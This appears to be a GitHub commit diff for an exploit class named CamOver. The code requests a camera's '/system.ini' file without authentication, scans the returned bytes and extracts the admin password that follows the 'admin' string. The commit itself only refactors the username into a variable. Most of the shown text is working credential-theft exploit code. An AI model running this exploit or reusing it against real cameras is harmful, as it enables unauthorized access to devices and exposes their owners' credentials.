| skipped 30 lines |
| 31 | 31 | | class CamOver: |
| 32 | 32 | | @staticmethod |
| 33 | 33 | | def exploit(address): |
| | 34 | + | username = 'admin' |
| | 35 | + | |
| 34 | 36 | | try: |
| 35 | 37 | | response = requests.get( |
| 36 | 38 | | f"http://{host}/system.ini?loginuse&loginpas", |
| skipped 5 lines |
| 42 | 44 | | |
| 43 | 45 | | if response.status_code == 200: |
| 44 | 46 | | strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text) |
| 45 | | - | if 'admin' in strings: |
| 46 | | - | username_index = strings.index('admin') |
| | 47 | + | |
| | 48 | + | if username in strings: |
| | 49 | + | username_index = strings.index(username) |
| 47 | 50 | | password = strings[username_index + 1] |
| | 51 | + | |
| 48 | 52 | | return 'admin', password |
| 49 | 53 | | |
Ivan Nikolsky
committed
with
GitHub
3 years ago
1 parent ef1c81f1